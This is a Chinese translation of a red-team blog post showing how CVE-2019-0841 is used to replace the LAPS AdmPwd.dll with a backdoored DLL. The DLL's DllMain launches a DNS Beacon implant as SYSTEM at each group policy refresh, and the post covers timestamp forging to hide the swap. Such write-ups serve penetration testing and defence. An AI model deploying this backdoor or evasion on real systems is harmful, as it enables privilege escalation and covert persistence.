利用LAPS武器化CVE-2019-0841

2019-04-29  本文已影响0人  白帽汇
22.png

4月9日,Nabeel Ahmed公布了CVE-2019-0841漏洞的细节。它可让低权限用户完全控制NT AUTHORITY\SYSTEM所属的文件,易引发权限提升攻击。Nabeel发布了一篇博客文章,详细描述了漏洞,并且还带有PoC代码演示视频

从视频中我们可以看到,一个低权限用户完全控制了psmachine.dll,然后利用谷歌Chrome的更新服务获得了一个SYSTEM权限的shell。但是,视频中的一系列操作在实际渗透操作中显然是很困难的,所以我和RythmStick一起尝试把这个权限提升方法模拟应用在实际渗透过程中。

不同于视频中利用Chrome浏览器作为攻击中介,RythmStick这次找到了LAPS作为我们的利用目标。

LAPS(Local Administrator Password Solution),本地管理员密码管理方案,用来集中管理域内主机本地管理员的口令,微软2015年发布。

我们已经知道了一些滥用LAPS的方法,而这次我们想利用一个DLL文件来创造一个system权限的shell。

本地计算机通过`AdmPwd.dll`执行所有LAPS功能,而且此DLL没有完整性检查,可以被修改替换。

开端

在我们的演示中,有一个HTTP Beacon,可看作一个低权限用户。该用户肯定不是本地管理员。

33.png

首先,让我们看看AdmPwd.dll的相关权限,以证明我们目前无法控制它。

44.png

CVE-2019-0841

Nabeel的PoC是用C语言编写的,所以我们必须将它上传到目标机器上运行。

55.png 66.png

再次检查文件的权限,现在,我们已完全控制了该文件。

77.png

AdmPwd.dll

此时,你可以将后门放置在你喜欢的任何位置,具体取决于你希望的后门触发条件。我们选择利用DllMain,以便在每个gpupdate(组策略刷新)时触发,但我认为将其在密码重置时触发是一个更有趣的权限维持方法。

因为我C语言能力很糟糕,所以只编写了一个非常简单的操作CreateProcess,它会以system权限运行一个恶意软件TikiSpawn.exe,里面包含了DNS Beacon的payload。

void Backdoor()
{
    STARTUPINFO sInfo;
    PROCESS_INFORMATION pInfo;

    RtlSecureZeroMemory(&sInfo, sizeof(sInfo));
    RtlSecureZeroMemory(&pInfo, sizeof(pInfo));
    sInfo.cb = sizeof(sInfo);

    GetStartupInfoW(&sInfo);

    CreateProcess(L"C:\\Windows\\System32\\Tasks\\TikiSpawn.exe", NULL, NULL, NULL, FALSE, NULL, NULL, L"C:\\Windows\\System32",
        &sInfo, &pInfo);

    CloseHandle(pInfo.hProcess);
    CloseHandle(pInfo.hThread);

    return;
}

//DllMain, Installation, Uninstallation
BOOL APIENTRY DllMain( HANDLE hModule, DWORD  ul_reason, LPVOID lpReserved) {
    if(ul_reason==DLL_PROCESS_ATTACH) {
        Backdoor();
        hDll=(HINSTANCE)hModule;
    }
    return TRUE;
}

覆盖DLL文件是非常简单的,直接进入文件夹C:\Program Files\LAPS\CSE,上传即可。

88.png

时间戳

这时,你还可以修改其时间戳,让它看起来更合理。如果机器已安装了LAPS的UI,那么可以把时间戳修改的和AdmPwd.Utils.dll一样。

99.png 100.png

请注意,上图中CSE目录的04/13/2019是LAPS的安装日期。

GPUpdate

在组策略刷新之后,我们获得了DNS Beacon。

110.png 120.png

以下就是Beacon在Process Explorer中的表现。看起来和系统自启动的正常程序很相似,虽然也有一些其他的问题(我也许会另写一篇文章来说明)。

130.png

在几个小时后,我们得到了一堆Beacon。

140.png

感谢你的阅读!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/2534.html
来源:https://rastamouse.me/2019/04/weaponizing-cve-2019-0841-with-laps/

上一篇下一篇

猜你喜欢

热点阅读